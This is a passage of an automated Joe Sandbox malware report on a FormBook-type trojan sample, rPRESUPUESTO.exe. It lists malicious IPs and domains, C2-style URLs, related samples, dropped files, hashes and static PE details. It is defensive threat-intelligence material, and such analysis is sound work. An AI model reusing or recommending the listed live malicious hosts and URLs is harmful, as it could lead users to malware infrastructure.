                                              https://www.active24.com/upozorneniktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              122.10.13.122
                                              		2xin3.zhanghonghong.comHong Kong
                                              		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                              74.208.236.72
                                              		www.transelva.comUnited States
                                              		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                              121.254.178.238
                                              		www.b6fbly7u.shopKorea Republic of
                                              		3786LGDACOMLGDACOMCorporationKRtrue
                                              192.207.62.21
                                              		225.jtrhc.funUnited States
                                              		394180HOSTBREWUStrue
                                              72.52.179.174
                                              		www.europedriveguide.comUnited States
                                              		32244LIQUIDWEBUStrue
                                              192.227.175.142
                                              		www.coinmao.comUnited States
                                              		36352AS-COLOCROSSINGUStrue
                                              199.59.243.226
                                              		www.mommysdaycare.netUnited States
                                              		395082BODIS-NJUStrue
                                              203.161.62.199
                                              		www.quantumvoil.xyzMalaysia
                                              		45899VNPT-AS-VNVNPTCorpVNtrue
                                              109.123.121.243
                                              		www.rlplatro.sbsUnited Kingdom
                                              		13213UK2NET-ASGBtrue
                                              103.224.182.246
                                              		www.atmpla.netAustralia
                                              		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                              31.186.11.254
                                              		genesiestudios.onlineTurkey
                                              		199484BETAINTERNATIONALTRtrue
                                              45.207.12.95
                                              		www.203av.comSeychelles
                                              		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                              81.95.96.29
                                              		www.hydrogenmovie.comCzech Republic
                                              		25234GLOBE-AShttpwwwactive24czCZtrue
                                              47.242.109.15
                                              		www.xsemckm.sbsUnited States
                                              		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue

                                              General Information

                                              Joe Sandbox version:40.0.0 Tourmaline
                                              Analysis ID:1465409
                                              Start date and time:2024-07-01 16:14:15 +02:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 12m 7s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:12
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:2
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:rPRESUPUESTO.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.winEXE@11/7@16/14
                                              EGA Information:
                                              • Successful, ratio: 75%
                                              HCA Information:
                                              • Successful, ratio: 94%
                                              • Number of executed functions: 117
                                              • Number of non-executed functions: 295
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, ocsp.usertrust.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, crl.usertrust.com, ocsp.comodoca.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target MqDMLUHvZmSMqiwTfIsHo.exe, PID 5908 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                              • VT rate limit hit for: rPRESUPUESTO.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              10:15:11API Interceptor38x Sleep call for process: rPRESUPUESTO.exe modified
                                              10:15:16API Interceptor15x Sleep call for process: powershell.exe modified
                                              10:16:10API Interceptor11591734x Sleep call for process: ktmutil.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              122.10.13.122ORS51123MQ90EI.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.b3622.com/plo0/?V0jtHFpx=anGHQVCrc4SqssYdRkTliFNXqZAWz/5sOo2hBlc3q+BNseT04x1FGTnEuxBnNEaeqsRJF0fXaeNNKZRktI/en319nJ0Pan9rrQ==&fVNT=znDXT2Wpr
                                              Request_List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.b3622.com/oiwu/?Jz0HU=bu9tjx1KriJdp6g4n3nfiJpyoBqItJaXkdLNaTp0zc/40YeFGlTdEXP3IR2WurMK/sFXp/7XII3NTl1GojnQZ1Uh9Nv2gNX8eA==&M4=XF_T
                                              74.208.236.72Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • www.transelva.com/edi4/
                                              121.254.178.238Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • www.b6fbly7u.shop/vjxp/
                                              REVISED_SOA_USD44,000.exeGet hashmaliciousFormBookBrowse
                                              • www.b6fbly7u.shop/qhw3/?wbG4hna=SzfoKa6oAy2ssRW1E/1BdlOXWzVQSPZ4GsRIyBDsYVs0f/1x7fdErOnRj+igVmDJhgwAN6+7arq6rcNzYuHWNaY6s3vxchoLMA==&sp=HZv8HZP0uNAPmdd
                                              SSLTD.xlsGet hashmaliciousFormBookBrowse
                                              • www.b6fbly7u.shop/o868/?FXW0=zS19T6e++UH+oAABRLFYifYOxGKk47oPHgJrQ8aZEEEISs0rVDEalaIhFKAwQZETKn5Y0sUhnp8Yz6GVX+HHtJ1vqNbEVleKhR8kqhc=&MtV=KvXpxj
                                              192.207.62.21Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • www.gsdaluan.shop/8urb/
                                              PIG860624BF1GE1532.xml.exeGet hashmaliciousFormBookBrowse
                                              • www.xehairen.icu/q696/
                                              Yemenittiskes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.vgjimei.icu/a8pp/
                                              pp0fHVNbib.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.vgjimei.icu/a8pp/
                                              ulACwpUCSU.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • www.vgjimei.icu/a8pp/
                                              12nTpM7hB1.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • www.xehairen.icu/q696/
                                              OSL332C-HBLx#U180es#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                              • www.xehairen.icu/q696/
                                              72.52.179.1741R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                              • www.europedriveguide.com/67iq/
                                              mEESdHRhbB.exeGet hashmaliciousFormBookBrowse
                                              • www.europedriveguide.com/67iq/
                                              Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • www.europedriveguide.com/2pcd/
                                              http://bonalluterser.com/Get hashmaliciousUnknownBrowse
                                              • ww99.bonalluterser.com/
                                              file.exeGet hashmaliciousCMSBruteBrowse
                                              • runfoxyrun.com/admin/
                                              http://dohigu.comGet hashmaliciousUnknownBrowse
                                              • ww99.dohigu.com/
                                              http://zacharryblogs.comGet hashmaliciousUnknownBrowse
                                              • ww99.zacharryblogs.com/
                                              spug64.exeGet hashmaliciousSimda StealerBrowse
                                              • gatyhub.com/login.php
                                              raidcall-7-3-6-es-en-br-de-win.exeGet hashmaliciousUnknownBrowse
                                              • www.raidtalk.com/client/medal/medal_config.php?ver=&lang=en-us
                                              LloUcldOtM.exeGet hashmaliciousFormBookBrowse
                                              • www.imikimi.nl/dmpz/?D488l2=r0bdDsLIiyTKJ3IVtqHlZy20iySfPAC9GQaTAhOWhGtoAjSiw20W7ibYi253e3/z6yB2kTlyXMaTZQskGHpyG05mqqWKjLdt0g==&8pTd=d85xeTfP5L54klq

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              www.quantumvoil.xyzInvoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.62.199
                                              DHL Consigment_pdf.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.62.199
                                              DHL Overdue Account Notice-1301645540.exeGet hashmaliciousFormBookBrowse
                                              • 203.161.62.199
                                              Quotation.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                              • 203.161.62.199
                                              Quotation_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                              • 203.161.62.199
                                              2xin3.zhanghonghong.comInvoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • 122.10.13.122
                                              ORS51123MQ90EI.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 122.10.13.122
                                              Request_List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 122.10.13.122
                                              225.jtrhc.funInvoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • 192.207.62.21
                                              NEW_ORDER_LIST.exeGet hashmaliciousFormBookBrowse
                                              • 8.217.154.16
                                              Quotation-3927377773.exeGet hashmaliciousFormBookBrowse
                                              • 8.217.154.16
                                              SWIFT-PYT.exeGet hashmaliciousFormBook, zgRATBrowse
                                              • 8.217.65.182
                                              New_Purchase_Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 8.217.65.182
                                              CI890892.6409410669pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 8.217.65.182
                                              Quotation.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                              • 8.217.65.182
                                              transf_LAB.REALpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 8.217.65.182
                                              Quotation_pdf.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                              • 8.217.65.182
                                              CtTZm1DHG4A9nbE.exeGet hashmaliciousFormBookBrowse
                                              • 8.217.65.182
                                              www.mommysdaycare.netInvoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • 199.59.243.226
                                              MOfdzIVSmy.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 199.59.243.225
                                              SecuriteInfo.com.Win32.PWSX-gen.8428.27403.exeGet hashmaliciousFormBookBrowse
                                              • 199.59.243.225
                                              OD.exeGet hashmaliciousFormBookBrowse
                                              • 199.59.243.225
                                              www.coinmao.comInvoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • 192.227.175.142
                                              New_Purchase_Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 172.67.129.52
                                              www.atmpla.netInvoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • 103.224.182.246

                                              ASNs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              LIQUIDWEBUS1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                              • 72.52.179.174
                                              SecureMessageAtt.htmlGet hashmaliciousUnknownBrowse
                                              • 209.59.158.95
                                              mEESdHRhbB.exeGet hashmaliciousFormBookBrowse
                                              • 72.52.179.174
                                              Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • 72.52.179.174
                                              http://slwgs.orgGet hashmaliciousUnknownBrowse
                                              • 67.225.191.147
                                              http://www.versa-valves.comGet hashmaliciousUnknownBrowse
                                              • 192.190.221.134
                                              http://10f6d83.wcomhost.com/Get hashmaliciousUnknownBrowse
                                              • 67.225.220.126
                                              t5SYVk0Tkt.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                              • 173.199.172.26
                                              UDxMi3I3lO.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                              • 64.91.253.60
                                              TL6bE5Uq4y.exeGet hashmaliciousPureLog Stealer, SystemBCBrowse
                                              • 64.91.253.60
                                              ONEANDONE-ASBrauerstrasse48DEyaM8XR1HfL.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                              • 217.160.0.1
                                              https://www.asarco.com/Get hashmaliciousUnknownBrowse
                                              • 74.208.236.164
                                              Att0027592.exeGet hashmaliciousFormBookBrowse
                                              • 217.76.156.252
                                              AWB 112-17259653.exeGet hashmaliciousFormBookBrowse
                                              • 217.160.0.144
                                              scan19062024.exeGet hashmaliciousFormBookBrowse
                                              • 212.227.172.254
                                              SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                                              • 217.160.0.130
                                              SecuriteInfo.com.Win32.Malware-gen.371.3693.exeGet hashmaliciousUnknownBrowse
                                              • 217.160.0.130
                                              Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exeGet hashmaliciousFormBookBrowse
                                              • 74.208.236.247
                                              Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                              • 212.227.172.254
                                              Fiyat ARH-4532817-PO 45328174563.exeGet hashmaliciousFormBookBrowse
                                              • 212.227.172.254
                                              LGDACOMLGDACOMCorporationKRRDEHNTKF1V.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 210.102.145.14
                                              s4WsI8Qcm4.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 58.78.9.182
                                              AvLj9c169F.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 211.43.219.246
                                              owONvNMYXu.elfGet hashmaliciousMiraiBrowse
                                              • 112.219.101.195
                                              wGkT1MeX0l.elfGet hashmaliciousMiraiBrowse
                                              • 106.254.246.254
                                              sora.mpsl.elfGet hashmaliciousMiraiBrowse
                                              • 1.223.163.231
                                              gErAvW63Ax.elfGet hashmaliciousMiraiBrowse
                                              • 211.169.7.8
                                              SHn7OPnmZC.elfGet hashmaliciousMiraiBrowse
                                              • 121.66.21.211
                                              aDOclS4aUu.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 202.31.32.207
                                              DRKi1Olgjp.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 211.168.191.62
                                              DXTL-HKDXTLTseungKwanOServiceHK1R50C5E13BU8I.exeGet hashmaliciousFormBookBrowse
                                              • 154.214.114.86
                                              V7UaNBrX72.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 45.193.98.136
                                              botx.x86.elfGet hashmaliciousMiraiBrowse
                                              • 154.80.147.150
                                              rCjg912Ssb.elfGet hashmaliciousMiraiBrowse
                                              • 103.92.9.210
                                              mEESdHRhbB.exeGet hashmaliciousFormBookBrowse
                                              • 154.214.114.86
                                              SWU5109523I.exeGet hashmaliciousFormBook, LokibotBrowse
                                              • 154.214.114.86
                                              Invoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • 45.207.12.95
                                              arm7-20240623-2204.elfGet hashmaliciousMiraiBrowse
                                              • 156.235.142.166
                                              gtMzliIYIc.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 154.219.221.18
                                              8G8Sb4x61K.elfGet hashmaliciousMiraiBrowse
                                              • 156.235.217.22
                                              HOSTBREWUSInvoice_Payment.exeGet hashmaliciousFormBookBrowse
                                              • 192.207.62.21
                                              PIG860624BF1GE1532.xml.exeGet hashmaliciousFormBookBrowse
                                              • 192.207.62.21
                                              Yemenittiskes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 192.207.62.21
                                              pp0fHVNbib.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 192.207.62.21
                                              ulACwpUCSU.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 192.207.62.21
                                              12nTpM7hB1.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                              • 192.207.62.21
                                              OSL332C-HBLx#U180es#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                              • 192.207.62.21
                                              odSNe417qU.elfGet hashmaliciousBillGatesBrowse
                                              • 192.207.62.45
                                              wow.exeGet hashmaliciousMetasploitBrowse
                                              • 74.114.158.110

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rPRESUPUESTO.exe.log

                                              Download File
                                              Process:C:\Users\user\Desktop\rPRESUPUESTO.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1500
                                              Entropy (8bit):5.345358309061185
                                              Encrypted:false
                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAHQ
                                              MD5:215B3562F83C4FB9BBB129D2F9E59ADA
                                              SHA1:0534A53F6F42ECA7E56EB02E328A2025254AC511
                                              SHA-256:4CF4451F940D8D730D8209079E1404A1EAD1A36C33E69AB8AE43E0E7D33B4450
                                              SHA-512:E09A97CE89258E1BCDA4832E1348720EBCD462E0C81736CCAD8D99AB1AC60ECBAF5E1F552C4F0977F498D25E27739197D2A9C1EFFDEB7116020D106231EB7C43
                                              Malicious:true
                                              Reputation:moderate, very likely benign file
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc

                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):2232
                                              Entropy (8bit):5.379736180876081
                                              Encrypted:false
                                              SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZmUyus:tLHyIFKL3IZ2KRH9Ouggs
                                              MD5:E4532FAC52FB479867BAF60958F8E50C
                                              SHA1:6736C4FA0AFCE32F8E206C7F414A902A96A45E5B
                                              SHA-256:E1475E82065BB6BAD4E6C71F033E48B8DEEB85FACB251FC1D098E4D22AB6F7FB
                                              SHA-512:506DC2488F6E6824D763CE955B276705DC4BD0218024A6C03FF369B1221484F4E0CA09062432D1C0017704F2EC5276AEFD0DFB4F8D3AFDE6750BBBEED4B4B48A
                                              Malicious:false
                                              Reputation:low
                                              Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                              C:\Users\user\AppData\Local\Temp\07c402-5

                                              Download File
                                              Process:C:\Windows\SysWOW64\ktmutil.exe
                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                              Category:dropped
                                              Size (bytes):196608
                                              Entropy (8bit):1.121297215059106
                                              Encrypted:false
                                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                              MD5:D87270D0039ED3A5A72E7082EA71E305
                                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggwsvlml.yr5.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oaoerwqi.pzx.ps1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pul4memt.qud.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vtza4nxy.w3x.psm1

                                              Download File
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.908948155144851
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                              • Win32 Executable (generic) a (10002005/4) 49.93%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              File name:rPRESUPUESTO.exe
                                              File size:713'736 bytes
                                              MD5:e78d43a26913cf101b98d1d04839eee2
                                              SHA1:911c8c10f7c8bc9fd3c6bd16e9f5da11e3c3eb5d
                                              SHA256:8f9dbdd77e130b7238761966a9c9aa8712baf2100ddebc3d9d206ee17f8f119c
                                              SHA512:bffe8fb15a48272c7de1893a75e0f8bacc8ef635395639b10e64bfc41fbd5d8dd63f43c0f85302a1823251b3fb2e1e9edbdd34f624ed0f683c2adbfe328b7811
                                              SSDEEP:12288:s99glhLQbCawDK1ko+anBlfU4JqOIxTXZ9cmJ1oleOZLitjmJhSGZ3jVfkUnkR:sOiw+1DLnjfdIJ9cqZtKRy
                                              TLSH:B1E41245A3FCAB16F6B697F138B1401003BC35666660D34C1ECA64CF26A7F956B30B6B
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. ....................... ............@................................

                                              File Icon

                                              Icon Hash:00928e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x4ac21e
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0xEEB2EB9E [Sun Nov 25 17:32:14 2096 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Authenticode Signature

                                              Signature Valid:false
                                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before, Not After
                                              • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                              Subject Chain
                                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                              Version:3
                                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                              Serial:7C1118CBBADC95DA3752C46E47A27438

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
